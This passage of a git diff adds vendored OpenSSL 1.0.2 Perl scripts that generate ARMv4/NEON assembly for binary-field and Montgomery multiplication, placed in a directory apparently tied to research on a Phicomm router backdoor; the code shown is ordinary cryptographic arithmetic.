+# used in bn_gf2m.c. It's kind of low-hanging mechanical port from
+# C for the time being... Except that it has two code paths: pure
+# integer code suitable for any ARMv4 and later CPU and NEON code
+# suitable for ARMv7. Pure integer 1x1 multiplication subroutine runs
+# in ~45 cycles on dual-issue core such as Cortex A8, which is ~50%
+# faster than compiler-generated code. For ECDH and ECDSA verify (but
+# not for ECDSA sign) it means 25%-45% improvement depending on key
+# length, more for longer keys. Even though NEON 1x1 multiplication
+# runs in even less cycles, ~30, improvement is measurable only on
+# longer keys. One has to optimize code elsewhere to get NEON glow...
+#
+# April 2014
+#
+# Double bn_GF2m_mul_2x2 performance by using algorithm from paper
+# referred below, which improves ECDH and ECDSA verify benchmarks
+# by 18-40%.
+#
+# Câmara, D.; Gouvêa, C. P. L.; López, J. & Dahab, R.: Fast Software
+# Polynomial Multiplication on ARM Processors using the NEON Engine.
+# 
+# http://conradoplg.cryptoland.net/files/2010/12/mocrysen13.pdf
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$code=<<___;
+#include "arm_arch.h"
+
+.text
+.code	32
+___
+################
+# private interface to mul_1x1_ialu
+#
+$a="r1";
+$b="r0";
+
+($a0,$a1,$a2,$a12,$a4,$a14)=
+($hi,$lo,$t0,$t1, $i0,$i1 )=map("r$_",(4..9),12);
+
+$mask="r12";
+
+$code.=<<___;
+.type	mul_1x1_ialu,%function
+.align	5
+mul_1x1_ialu:
+	mov	$a0,#0
+	bic	$a1,$a,#3<<30		@ a1=a&0x3fffffff
+	str	$a0,[sp,#0]		@ tab[0]=0
+	add	$a2,$a1,$a1		@ a2=a1<<1
+	str	$a1,[sp,#4]		@ tab[1]=a1
+	eor	$a12,$a1,$a2		@ a1^a2
+	str	$a2,[sp,#8]		@ tab[2]=a2
+	mov	$a4,$a1,lsl#2		@ a4=a1<<2
+	str	$a12,[sp,#12]		@ tab[3]=a1^a2
+	eor	$a14,$a1,$a4		@ a1^a4
+	str	$a4,[sp,#16]		@ tab[4]=a4
+	eor	$a0,$a2,$a4		@ a2^a4
+	str	$a14,[sp,#20]		@ tab[5]=a1^a4
+	eor	$a12,$a12,$a4		@ a1^a2^a4
+	str	$a0,[sp,#24]		@ tab[6]=a2^a4
+	and	$i0,$mask,$b,lsl#2
+	str	$a12,[sp,#28]		@ tab[7]=a1^a2^a4
+
+	and	$i1,$mask,$b,lsr#1
+	ldr	$lo,[sp,$i0]		@ tab[b       & 0x7]
+	and	$i0,$mask,$b,lsr#4
+	ldr	$t1,[sp,$i1]		@ tab[b >>  3 & 0x7]
+	and	$i1,$mask,$b,lsr#7
+	ldr	$t0,[sp,$i0]		@ tab[b >>  6 & 0x7]
+	eor	$lo,$lo,$t1,lsl#3	@ stall
+	mov	$hi,$t1,lsr#29
+	ldr	$t1,[sp,$i1]		@ tab[b >>  9 & 0x7]
+
+	and	$i0,$mask,$b,lsr#10
+	eor	$lo,$lo,$t0,lsl#6
+	eor	$hi,$hi,$t0,lsr#26
+	ldr	$t0,[sp,$i0]		@ tab[b >> 12 & 0x7]
+
+	and	$i1,$mask,$b,lsr#13
+	eor	$lo,$lo,$t1,lsl#9
+	eor	$hi,$hi,$t1,lsr#23
+	ldr	$t1,[sp,$i1]		@ tab[b >> 15 & 0x7]
+
+	and	$i0,$mask,$b,lsr#16
+	eor	$lo,$lo,$t0,lsl#12
+	eor	$hi,$hi,$t0,lsr#20
+	ldr	$t0,[sp,$i0]		@ tab[b >> 18 & 0x7]
+
+	and	$i1,$mask,$b,lsr#19
+	eor	$lo,$lo,$t1,lsl#15
+	eor	$hi,$hi,$t1,lsr#17
+	ldr	$t1,[sp,$i1]		@ tab[b >> 21 & 0x7]
+
+	and	$i0,$mask,$b,lsr#22
+	eor	$lo,$lo,$t0,lsl#18
+	eor	$hi,$hi,$t0,lsr#14
+	ldr	$t0,[sp,$i0]		@ tab[b >> 24 & 0x7]
+
+	and	$i1,$mask,$b,lsr#25
+	eor	$lo,$lo,$t1,lsl#21
+	eor	$hi,$hi,$t1,lsr#11
+	ldr	$t1,[sp,$i1]		@ tab[b >> 27 & 0x7]
+
+	tst	$a,#1<<30
+	and	$i0,$mask,$b,lsr#28
+	eor	$lo,$lo,$t0,lsl#24
+	eor	$hi,$hi,$t0,lsr#8
+	ldr	$t0,[sp,$i0]		@ tab[b >> 30      ]
+
+	eorne	$lo,$lo,$b,lsl#30
+	eorne	$hi,$hi,$b,lsr#2
+	tst	$a,#1<<31
+	eor	$lo,$lo,$t1,lsl#27
+	eor	$hi,$hi,$t1,lsr#5
+	eorne	$lo,$lo,$b,lsl#31
+	eorne	$hi,$hi,$b,lsr#1
+	eor	$lo,$lo,$t0,lsl#30
+	eor	$hi,$hi,$t0,lsr#2
+
+	mov	pc,lr
+.size	mul_1x1_ialu,.-mul_1x1_ialu
+___
+################
+# void	bn_GF2m_mul_2x2(BN_ULONG *r,
+#	BN_ULONG a1,BN_ULONG a0,
+#	BN_ULONG b1,BN_ULONG b0);	# r[3..0]=a1a0·b1b0
+{
+$code.=<<___;
+.global	bn_GF2m_mul_2x2
+.type	bn_GF2m_mul_2x2,%function
+.align	5
+bn_GF2m_mul_2x2:
+#if __ARM_MAX_ARCH__>=7
+	ldr	r12,.LOPENSSL_armcap
+.Lpic:	ldr	r12,[pc,r12]
+	tst	r12,#1
+	bne	.LNEON
+#endif
+___
+$ret="r10";	# reassigned 1st argument
+$code.=<<___;
+	stmdb	sp!,{r4-r10,lr}
+	mov	$ret,r0			@ reassign 1st argument
+	mov	$b,r3			@ $b=b1
+	ldr	r3,[sp,#32]		@ load b0
+	mov	$mask,#7<<2
+	sub	sp,sp,#32		@ allocate tab[8]
+
+	bl	mul_1x1_ialu		@ a1·b1
+	str	$lo,[$ret,#8]
+	str	$hi,[$ret,#12]
+
+	eor	$b,$b,r3		@ flip b0 and b1
+	 eor	$a,$a,r2		@ flip a0 and a1
+	eor	r3,r3,$b
+	 eor	r2,r2,$a
+	eor	$b,$b,r3
+	 eor	$a,$a,r2
+	bl	mul_1x1_ialu		@ a0·b0
+	str	$lo,[$ret]
+	str	$hi,[$ret,#4]
+
+	eor	$a,$a,r2
+	eor	$b,$b,r3
+	bl	mul_1x1_ialu		@ (a1+a0)·(b1+b0)
+___
+@r=map("r$_",(6..9));
+$code.=<<___;
+	ldmia	$ret,{@r[0]-@r[3]}
+	eor	$lo,$lo,$hi
+	eor	$hi,$hi,@r[1]
+	eor	$lo,$lo,@r[0]
+	eor	$hi,$hi,@r[2]
+	eor	$lo,$lo,@r[3]
+	eor	$hi,$hi,@r[3]
+	str	$hi,[$ret,#8]
+	eor	$lo,$lo,$hi
+	add	sp,sp,#32		@ destroy tab[8]
+	str	$lo,[$ret,#4]
+
+#if __ARM_ARCH__>=5
+	ldmia	sp!,{r4-r10,pc}
+#else
+	ldmia	sp!,{r4-r10,lr}
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+___
+}
+{
+my ($r,$t0,$t1,$t2,$t3)=map("q$_",(0..3,8..12));
+my ($a,$b,$k48,$k32,$k16)=map("d$_",(26..31));
+
+$code.=<<___;
+#if __ARM_MAX_ARCH__>=7
+.arch	armv7-a
+.fpu	neon
+
+.align	5
+.LNEON:
+	ldr		r12, [sp]		@ 5th argument
+	vmov.32		$a, r2, r1
+	vmov.32		$b, r12, r3
+	vmov.i64	$k48, #0x0000ffffffffffff
+	vmov.i64	$k32, #0x00000000ffffffff
+	vmov.i64	$k16, #0x000000000000ffff
+
+	vext.8		$t0#lo, $a, $a, #1	@ A1
+	vmull.p8	$t0, $t0#lo, $b		@ F = A1*B
+	vext.8		$r#lo, $b, $b, #1	@ B1
+	vmull.p8	$r, $a, $r#lo		@ E = A*B1
+	vext.8		$t1#lo, $a, $a, #2	@ A2
+	vmull.p8	$t1, $t1#lo, $b		@ H = A2*B
+	vext.8		$t3#lo, $b, $b, #2	@ B2
+	vmull.p8	$t3, $a, $t3#lo		@ G = A*B2
+	vext.8		$t2#lo, $a, $a, #3	@ A3
+	veor		$t0, $t0, $r		@ L = E + F
+	vmull.p8	$t2, $t2#lo, $b		@ J = A3*B
+	vext.8		$r#lo, $b, $b, #3	@ B3
+	veor		$t1, $t1, $t3		@ M = G + H
+	vmull.p8	$r, $a, $r#lo		@ I = A*B3
+	veor		$t0#lo, $t0#lo, $t0#hi	@ t0 = (L) (P0 + P1) << 8
+	vand		$t0#hi, $t0#hi, $k48
+	vext.8		$t3#lo, $b, $b, #4	@ B4
+	veor		$t1#lo, $t1#lo, $t1#hi	@ t1 = (M) (P2 + P3) << 16
+	vand		$t1#hi, $t1#hi, $k32
+	vmull.p8	$t3, $a, $t3#lo		@ K = A*B4
+	veor		$t2, $t2, $r		@ N = I + J
+	veor		$t0#lo, $t0#lo, $t0#hi
+	veor		$t1#lo, $t1#lo, $t1#hi
+	veor		$t2#lo, $t2#lo, $t2#hi	@ t2 = (N) (P4 + P5) << 24
+	vand		$t2#hi, $t2#hi, $k16
+	vext.8		$t0, $t0, $t0, #15
+	veor		$t3#lo, $t3#lo, $t3#hi	@ t3 = (K) (P6 + P7) << 32
+	vmov.i64	$t3#hi, #0
+	vext.8		$t1, $t1, $t1, #14
+	veor		$t2#lo, $t2#lo, $t2#hi
+	vmull.p8	$r, $a, $b		@ D = A*B
+	vext.8		$t3, $t3, $t3, #12
+	vext.8		$t2, $t2, $t2, #13
+	veor		$t0, $t0, $t1
+	veor		$t2, $t2, $t3
+	veor		$r, $r, $t0
+	veor		$r, $r, $t2
+
+	vst1.32		{$r}, [r0]
+	ret		@ bx lr
+#endif
+___
+}
+$code.=<<___;
+.size	bn_GF2m_mul_2x2,.-bn_GF2m_mul_2x2
+#if __ARM_MAX_ARCH__>=7
+.align	5
+.LOPENSSL_armcap:
+.word	OPENSSL_armcap_P-(.Lpic+8)
+#endif
+.asciz	"GF(2^m) Multiplication for ARMv4/NEON, CRYPTOGAMS by <appro\@openssl.org>"
+.align	5
+
+#if __ARM_MAX_ARCH__>=7
+.comm	OPENSSL_armcap_P,4,4
+#endif
+___
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/geo;
+
+	s/\bq([0-9]+)#(lo|hi)/sprintf "d%d",2*$1+($2 eq "hi")/geo	or
+	s/\bret\b/bx	lr/go		or
+	s/\bbx\s+lr\b/.word\t0xe12fff1e/go;    # make it possible to compile with -march=armv4
+
+	print $_,"\n";
+}
+close STDOUT;   # enforce flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/armv4-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/armv4-mont.pl
new file mode 100644
index 0000000..1d330e9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/armv4-mont.pl
@@ -0,0 +1,676 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# January 2007.
+
+# Montgomery multiplication for ARMv4.
+#
+# Performance improvement naturally varies among CPU implementations
+# and compilers. The code was observed to provide +65-35% improvement
+# [depending on key length, less for longer keys] on ARM920T, and
+# +115-80% on Intel IXP425. This is compared to pre-bn_mul_mont code
+# base and compiler generated code with in-lined umull and even umlal
+# instructions. The latter means that this code didn't really have an 
+# "advantage" of utilizing some "secret" instruction.
+#
+# The code is interoperable with Thumb ISA and is rather compact, less
+# than 1/2KB. Windows CE port would be trivial, as it's exclusively
+# about decorations, ABI and instruction syntax are identical.
+
+# November 2013
+#
+# Add NEON code path, which handles lengths divisible by 8. RSA/DSA
+# performance improvement on Cortex-A8 is ~45-100% depending on key
+# length, more for longer keys. On Cortex-A15 the span is ~10-105%.
+# On Snapdragon S4 improvement was measured to vary from ~70% to
+# incredible ~380%, yes, 4.8x faster, for RSA4096 sign. But this is
+# rather because original integer-only code seems to perform
+# suboptimally on S4. Situation on Cortex-A9 is unfortunately
+# different. It's being looked into, but the trouble is that
+# performance for vectors longer than 256 bits is actually couple
+# of percent worse than for integer-only code. The code is chosen
+# for execution on all NEON-capable processors, because gain on
+# others outweighs the marginal loss on Cortex-A9.
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$num="r0";	# starts as num argument, but holds &tp[num-1]
+$ap="r1";
+$bp="r2"; $bi="r2"; $rp="r2";
+$np="r3";
+$tp="r4";
+$aj="r5";
+$nj="r6";
+$tj="r7";
+$n0="r8";
+###########	# r9 is reserved by ELF as platform specific, e.g. TLS pointer
+$alo="r10";	# sl, gcc uses it to keep @GOT
+$ahi="r11";	# fp
+$nlo="r12";	# ip
+###########	# r13 is stack pointer
+$nhi="r14";	# lr
+###########	# r15 is program counter
+
+#### argument block layout relative to &tp[num-1], a.k.a. $num
+$_rp="$num,#12*4";
+# ap permanently resides in r1
+$_bp="$num,#13*4";
+# np permanently resides in r3
+$_n0="$num,#14*4";
+$_num="$num,#15*4";	$_bpend=$_num;
+
+$code=<<___;
+#include "arm_arch.h"
+
+.text
+.code	32
+
+#if __ARM_MAX_ARCH__>=7
+.align	5
+.LOPENSSL_armcap:
+.word	OPENSSL_armcap_P-bn_mul_mont
+#endif
+
+.global	bn_mul_mont
+.type	bn_mul_mont,%function
+
+.align	5
+bn_mul_mont:
+	ldr	ip,[sp,#4]		@ load num
+	stmdb	sp!,{r0,r2}		@ sp points at argument block
+#if __ARM_MAX_ARCH__>=7
+	tst	ip,#7
+	bne	.Lialu
+	adr	r0,bn_mul_mont
+	ldr	r2,.LOPENSSL_armcap
+	ldr	r0,[r0,r2]
+	tst	r0,#1			@ NEON available?
+	ldmia	sp, {r0,r2}
+	beq	.Lialu
+	add	sp,sp,#8
+	b	bn_mul8x_mont_neon
+.align	4
+.Lialu:
+#endif
+	cmp	ip,#2
+	mov	$num,ip			@ load num
+	movlt	r0,#0
+	addlt	sp,sp,#2*4
+	blt	.Labrt
+
+	stmdb	sp!,{r4-r12,lr}		@ save 10 registers
+
+	mov	$num,$num,lsl#2		@ rescale $num for byte count
+	sub	sp,sp,$num		@ alloca(4*num)
+	sub	sp,sp,#4		@ +extra dword
+	sub	$num,$num,#4		@ "num=num-1"
+	add	$tp,$bp,$num		@ &bp[num-1]
+
+	add	$num,sp,$num		@ $num to point at &tp[num-1]
+	ldr	$n0,[$_n0]		@ &n0
+	ldr	$bi,[$bp]		@ bp[0]
+	ldr	$aj,[$ap],#4		@ ap[0],ap++
+	ldr	$nj,[$np],#4		@ np[0],np++
+	ldr	$n0,[$n0]		@ *n0
+	str	$tp,[$_bpend]		@ save &bp[num]
+
+	umull	$alo,$ahi,$aj,$bi	@ ap[0]*bp[0]
+	str	$n0,[$_n0]		@ save n0 value
+	mul	$n0,$alo,$n0		@ "tp[0]"*n0
+	mov	$nlo,#0
+	umlal	$alo,$nlo,$nj,$n0	@ np[0]*n0+"t[0]"
+	mov	$tp,sp
+
+.L1st:
+	ldr	$aj,[$ap],#4		@ ap[j],ap++
+	mov	$alo,$ahi
+	ldr	$nj,[$np],#4		@ np[j],np++
+	mov	$ahi,#0
+	umlal	$alo,$ahi,$aj,$bi	@ ap[j]*bp[0]
+	mov	$nhi,#0
+	umlal	$nlo,$nhi,$nj,$n0	@ np[j]*n0
+	adds	$nlo,$nlo,$alo
+	str	$nlo,[$tp],#4		@ tp[j-1]=,tp++
+	adc	$nlo,$nhi,#0
+	cmp	$tp,$num
+	bne	.L1st
+
+	adds	$nlo,$nlo,$ahi
+	ldr	$tp,[$_bp]		@ restore bp
+	mov	$nhi,#0
+	ldr	$n0,[$_n0]		@ restore n0
+	adc	$nhi,$nhi,#0
+	str	$nlo,[$num]		@ tp[num-1]=
+	str	$nhi,[$num,#4]		@ tp[num]=
+
+.Louter:
+	sub	$tj,$num,sp		@ "original" $num-1 value
+	sub	$ap,$ap,$tj		@ "rewind" ap to &ap[1]
+	ldr	$bi,[$tp,#4]!		@ *(++bp)
+	sub	$np,$np,$tj		@ "rewind" np to &np[1]
+	ldr	$aj,[$ap,#-4]		@ ap[0]
+	ldr	$alo,[sp]		@ tp[0]
+	ldr	$nj,[$np,#-4]		@ np[0]
+	ldr	$tj,[sp,#4]		@ tp[1]
+
+	mov	$ahi,#0
+	umlal	$alo,$ahi,$aj,$bi	@ ap[0]*bp[i]+tp[0]
+	str	$tp,[$_bp]		@ save bp
+	mul	$n0,$alo,$n0
+	mov	$nlo,#0
+	umlal	$alo,$nlo,$nj,$n0	@ np[0]*n0+"tp[0]"
+	mov	$tp,sp
+
+.Linner:
+	ldr	$aj,[$ap],#4		@ ap[j],ap++
+	adds	$alo,$ahi,$tj		@ +=tp[j]
+	ldr	$nj,[$np],#4		@ np[j],np++
+	mov	$ahi,#0
+	umlal	$alo,$ahi,$aj,$bi	@ ap[j]*bp[i]
+	mov	$nhi,#0
+	umlal	$nlo,$nhi,$nj,$n0	@ np[j]*n0
+	adc	$ahi,$ahi,#0
+	ldr	$tj,[$tp,#8]		@ tp[j+1]
+	adds	$nlo,$nlo,$alo
+	str	$nlo,[$tp],#4		@ tp[j-1]=,tp++
+	adc	$nlo,$nhi,#0
+	cmp	$tp,$num
+	bne	.Linner
+
+	adds	$nlo,$nlo,$ahi
+	mov	$nhi,#0
+	ldr	$tp,[$_bp]		@ restore bp
+	adc	$nhi,$nhi,#0
+	ldr	$n0,[$_n0]		@ restore n0
+	adds	$nlo,$nlo,$tj
+	ldr	$tj,[$_bpend]		@ restore &bp[num]
+	adc	$nhi,$nhi,#0
+	str	$nlo,[$num]		@ tp[num-1]=
+	str	$nhi,[$num,#4]		@ tp[num]=
+
+	cmp	$tp,$tj
+	bne	.Louter
+
+	ldr	$rp,[$_rp]		@ pull rp
+	add	$num,$num,#4		@ $num to point at &tp[num]
+	sub	$aj,$num,sp		@ "original" num value
+	mov	$tp,sp			@ "rewind" $tp
+	mov	$ap,$tp			@ "borrow" $ap
+	sub	$np,$np,$aj		@ "rewind" $np to &np[0]
+
+	subs	$tj,$tj,$tj		@ "clear" carry flag
+.Lsub:	ldr	$tj,[$tp],#4
+	ldr	$nj,[$np],#4
+	sbcs	$tj,$tj,$nj		@ tp[j]-np[j]
+	str	$tj,[$rp],#4		@ rp[j]=
+	teq	$tp,$num		@ preserve carry
+	bne	.Lsub
+	sbcs	$nhi,$nhi,#0		@ upmost carry
+	mov	$tp,sp			@ "rewind" $tp
+	sub	$rp,$rp,$aj		@ "rewind" $rp
+
+	and	$ap,$tp,$nhi
+	bic	$np,$rp,$nhi
+	orr	$ap,$ap,$np		@ ap=borrow?tp:rp
+
+.Lcopy:	ldr	$tj,[$ap],#4		@ copy or in-place refresh
+	str	sp,[$tp],#4		@ zap tp
+	str	$tj,[$rp],#4
+	cmp	$tp,$num
+	bne	.Lcopy
+
+	add	sp,$num,#4		@ skip over tp[num+1]
+	ldmia	sp!,{r4-r12,lr}		@ restore registers
+	add	sp,sp,#2*4		@ skip over {r0,r2}
+	mov	r0,#1
+.Labrt:
+#if __ARM_ARCH__>=5
+	ret				@ bx lr
+#else
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+.size	bn_mul_mont,.-bn_mul_mont
+___
+{
+sub Dlo()   { shift=~m|q([1]?[0-9])|?"d".($1*2):"";     }
+sub Dhi()   { shift=~m|q([1]?[0-9])|?"d".($1*2+1):"";   }
+
+my ($A0,$A1,$A2,$A3)=map("d$_",(0..3));
+my ($N0,$N1,$N2,$N3)=map("d$_",(4..7));
+my ($Z,$Temp)=("q4","q5");
+my ($A0xB,$A1xB,$A2xB,$A3xB,$A4xB,$A5xB,$A6xB,$A7xB)=map("q$_",(6..13));
+my ($Bi,$Ni,$M0)=map("d$_",(28..31));
+my $zero=&Dlo($Z);
+my $temp=&Dlo($Temp);
+
+my ($rptr,$aptr,$bptr,$nptr,$n0,$num)=map("r$_",(0..5));
+my ($tinptr,$toutptr,$inner,$outer)=map("r$_",(6..9));
+
+$code.=<<___;
+#if __ARM_MAX_ARCH__>=7
+.arch	armv7-a
+.fpu	neon
+
+.type	bn_mul8x_mont_neon,%function
+.align	5
+bn_mul8x_mont_neon:
+	mov	ip,sp
+	stmdb	sp!,{r4-r11}
+	vstmdb	sp!,{d8-d15}		@ ABI specification says so
+	ldmia	ip,{r4-r5}		@ load rest of parameter block
+
+	sub		$toutptr,sp,#16
+	vld1.32		{${Bi}[0]}, [$bptr,:32]!
+	sub		$toutptr,$toutptr,$num,lsl#4
+	vld1.32		{$A0-$A3},  [$aptr]!		@ can't specify :32 :-(
+	and		$toutptr,$toutptr,#-64
+	vld1.32		{${M0}[0]}, [$n0,:32]
+	mov		sp,$toutptr			@ alloca
+	veor		$zero,$zero,$zero
+	subs		$inner,$num,#8
+	vzip.16		$Bi,$zero
+
+	vmull.u32	$A0xB,$Bi,${A0}[0]
+	vmull.u32	$A1xB,$Bi,${A0}[1]
+	vmull.u32	$A2xB,$Bi,${A1}[0]
+	vshl.i64	$temp,`&Dhi("$A0xB")`,#16
+	vmull.u32	$A3xB,$Bi,${A1}[1]
+
+	vadd.u64	$temp,$temp,`&Dlo("$A0xB")`
+	veor		$zero,$zero,$zero
+	vmul.u32	$Ni,$temp,$M0
+
+	vmull.u32	$A4xB,$Bi,${A2}[0]
+	 vld1.32	{$N0-$N3}, [$nptr]!
+	vmull.u32	$A5xB,$Bi,${A2}[1]
+	vmull.u32	$A6xB,$Bi,${A3}[0]
+	vzip.16		$Ni,$zero
+	vmull.u32	$A7xB,$Bi,${A3}[1]
+
+	bne	.LNEON_1st
+
+	@ special case for num=8, everything is in register bank...
+
+	vmlal.u32	$A0xB,$Ni,${N0}[0]
+	sub		$outer,$num,#1
+	vmlal.u32	$A1xB,$Ni,${N0}[1]
+	vmlal.u32	$A2xB,$Ni,${N1}[0]
+	vmlal.u32	$A3xB,$Ni,${N1}[1]
+
+	vmlal.u32	$A4xB,$Ni,${N2}[0]
+	vmov		$Temp,$A0xB
+	vmlal.u32	$A5xB,$Ni,${N2}[1]
+	vmov		$A0xB,$A1xB
+	vmlal.u32	$A6xB,$Ni,${N3}[0]
+	vmov		$A1xB,$A2xB
+	vmlal.u32	$A7xB,$Ni,${N3}[1]
+	vmov		$A2xB,$A3xB
+	vmov		$A3xB,$A4xB
+	vshr.u64	$temp,$temp,#16
+	vmov		$A4xB,$A5xB
+	vmov		$A5xB,$A6xB
+	vadd.u64	$temp,$temp,`&Dhi("$Temp")`
+	vmov		$A6xB,$A7xB
+	veor		$A7xB,$A7xB
+	vshr.u64	$temp,$temp,#16
+
+	b	.LNEON_outer8
+
+.align	4
+.LNEON_outer8:
+	vld1.32		{${Bi}[0]}, [$bptr,:32]!
+	veor		$zero,$zero,$zero
+	vzip.16		$Bi,$zero
+	vadd.u64	`&Dlo("$A0xB")`,`&Dlo("$A0xB")`,$temp
+
+	vmlal.u32	$A0xB,$Bi,${A0}[0]
+	vmlal.u32	$A1xB,$Bi,${A0}[1]
+	vmlal.u32	$A2xB,$Bi,${A1}[0]
+	vshl.i64	$temp,`&Dhi("$A0xB")`,#16
+	vmlal.u32	$A3xB,$Bi,${A1}[1]
+
+	vadd.u64	$temp,$temp,`&Dlo("$A0xB")`
+	veor		$zero,$zero,$zero
+	subs		$outer,$outer,#1
+	vmul.u32	$Ni,$temp,$M0
+
+	vmlal.u32	$A4xB,$Bi,${A2}[0]
+	vmlal.u32	$A5xB,$Bi,${A2}[1]
+	vmlal.u32	$A6xB,$Bi,${A3}[0]
+	vzip.16		$Ni,$zero
+	vmlal.u32	$A7xB,$Bi,${A3}[1]
+
+	vmlal.u32	$A0xB,$Ni,${N0}[0]
+	vmlal.u32	$A1xB,$Ni,${N0}[1]
+	vmlal.u32	$A2xB,$Ni,${N1}[0]
+	vmlal.u32	$A3xB,$Ni,${N1}[1]
+
+	vmlal.u32	$A4xB,$Ni,${N2}[0]
+	vmov		$Temp,$A0xB
+	vmlal.u32	$A5xB,$Ni,${N2}[1]
+	vmov		$A0xB,$A1xB
+	vmlal.u32	$A6xB,$Ni,${N3}[0]
+	vmov		$A1xB,$A2xB
+	vmlal.u32	$A7xB,$Ni,${N3}[1]
+	vmov		$A2xB,$A3xB
+	vmov		$A3xB,$A4xB
+	vshr.u64	$temp,$temp,#16
+	vmov		$A4xB,$A5xB
+	vmov		$A5xB,$A6xB
+	vadd.u64	$temp,$temp,`&Dhi("$Temp")`
+	vmov		$A6xB,$A7xB
+	veor		$A7xB,$A7xB
+	vshr.u64	$temp,$temp,#16
+
+	bne	.LNEON_outer8
+
+	vadd.u64	`&Dlo("$A0xB")`,`&Dlo("$A0xB")`,$temp
+	mov		$toutptr,sp
+	vshr.u64	$temp,`&Dlo("$A0xB")`,#16
+	mov		$inner,$num
+	vadd.u64	`&Dhi("$A0xB")`,`&Dhi("$A0xB")`,$temp
+	add		$tinptr,sp,#16
+	vshr.u64	$temp,`&Dhi("$A0xB")`,#16
+	vzip.16		`&Dlo("$A0xB")`,`&Dhi("$A0xB")`
+
+	b	.LNEON_tail2
+
+.align	4
+.LNEON_1st:
+	vmlal.u32	$A0xB,$Ni,${N0}[0]
+	 vld1.32	{$A0-$A3}, [$aptr]!
+	vmlal.u32	$A1xB,$Ni,${N0}[1]
+	subs		$inner,$inner,#8
+	vmlal.u32	$A2xB,$Ni,${N1}[0]
+	vmlal.u32	$A3xB,$Ni,${N1}[1]
+
+	vmlal.u32	$A4xB,$Ni,${N2}[0]
+	 vld1.32	{$N0-$N1}, [$nptr]!
+	vmlal.u32	$A5xB,$Ni,${N2}[1]
+	 vst1.64	{$A0xB-$A1xB}, [$toutptr,:256]!
+	vmlal.u32	$A6xB,$Ni,${N3}[0]
+	vmlal.u32	$A7xB,$Ni,${N3}[1]
+	 vst1.64	{$A2xB-$A3xB}, [$toutptr,:256]!
+
+	vmull.u32	$A0xB,$Bi,${A0}[0]
+	 vld1.32	{$N2-$N3}, [$nptr]!
+	vmull.u32	$A1xB,$Bi,${A0}[1]
+	 vst1.64	{$A4xB-$A5xB}, [$toutptr,:256]!
+	vmull.u32	$A2xB,$Bi,${A1}[0]
+	vmull.u32	$A3xB,$Bi,${A1}[1]
+	 vst1.64	{$A6xB-$A7xB}, [$toutptr,:256]!
+
+	vmull.u32	$A4xB,$Bi,${A2}[0]
+	vmull.u32	$A5xB,$Bi,${A2}[1]
+	vmull.u32	$A6xB,$Bi,${A3}[0]
+	vmull.u32	$A7xB,$Bi,${A3}[1]
+
+	bne	.LNEON_1st
+
+	vmlal.u32	$A0xB,$Ni,${N0}[0]
+	add		$tinptr,sp,#16
+	vmlal.u32	$A1xB,$Ni,${N0}[1]
+	sub		$aptr,$aptr,$num,lsl#2		@ rewind $aptr
+	vmlal.u32	$A2xB,$Ni,${N1}[0]
+	 vld1.64	{$Temp}, [sp,:128]
+	vmlal.u32	$A3xB,$Ni,${N1}[1]
+	sub		$outer,$num,#1
+
+	vmlal.u32	$A4xB,$Ni,${N2}[0]
+	vst1.64		{$A0xB-$A1xB}, [$toutptr,:256]!
+	vmlal.u32	$A5xB,$Ni,${N2}[1]
+	vshr.u64	$temp,$temp,#16
+	 vld1.64	{$A0xB},       [$tinptr, :128]!
+	vmlal.u32	$A6xB,$Ni,${N3}[0]
+	vst1.64		{$A2xB-$A3xB}, [$toutptr,:256]!
+	vmlal.u32	$A7xB,$Ni,${N3}[1]
+
+	vst1.64		{$A4xB-$A5xB}, [$toutptr,:256]!
+	vadd.u64	$temp,$temp,`&Dhi("$Temp")`
+	veor		$Z,$Z,$Z
+	vst1.64		{$A6xB-$A7xB}, [$toutptr,:256]!
+	 vld1.64	{$A1xB-$A2xB}, [$tinptr, :256]!
+	vst1.64		{$Z},          [$toutptr,:128]
+	vshr.u64	$temp,$temp,#16
+
+	b		.LNEON_outer
+
+.align	4
+.LNEON_outer:
+	vld1.32		{${Bi}[0]}, [$bptr,:32]!
+	sub		$nptr,$nptr,$num,lsl#2		@ rewind $nptr
+	vld1.32		{$A0-$A3},  [$aptr]!
+	veor		$zero,$zero,$zero
+	mov		$toutptr,sp
+	vzip.16		$Bi,$zero
+	sub		$inner,$num,#8
+	vadd.u64	`&Dlo("$A0xB")`,`&Dlo("$A0xB")`,$temp
+
+	vmlal.u32	$A0xB,$Bi,${A0}[0]
+	 vld1.64	{$A3xB-$A4xB},[$tinptr,:256]!
+	vmlal.u32	$A1xB,$Bi,${A0}[1]
+	vmlal.u32	$A2xB,$Bi,${A1}[0]
+	 vld1.64	{$A5xB-$A6xB},[$tinptr,:256]!
+	vmlal.u32	$A3xB,$Bi,${A1}[1]
+
+	vshl.i64	$temp,`&Dhi("$A0xB")`,#16
+	veor		$zero,$zero,$zero
+	vadd.u64	$temp,$temp,`&Dlo("$A0xB")`
+	 vld1.64	{$A7xB},[$tinptr,:128]!
+	vmul.u32	$Ni,$temp,$M0
+
+	vmlal.u32	$A4xB,$Bi,${A2}[0]
+	 vld1.32	{$N0-$N3}, [$nptr]!
+	vmlal.u32	$A5xB,$Bi,${A2}[1]
+	vmlal.u32	$A6xB,$Bi,${A3}[0]
+	vzip.16		$Ni,$zero
+	vmlal.u32	$A7xB,$Bi,${A3}[1]
+
+.LNEON_inner:
+	vmlal.u32	$A0xB,$Ni,${N0}[0]
+	 vld1.32	{$A0-$A3}, [$aptr]!
+	vmlal.u32	$A1xB,$Ni,${N0}[1]
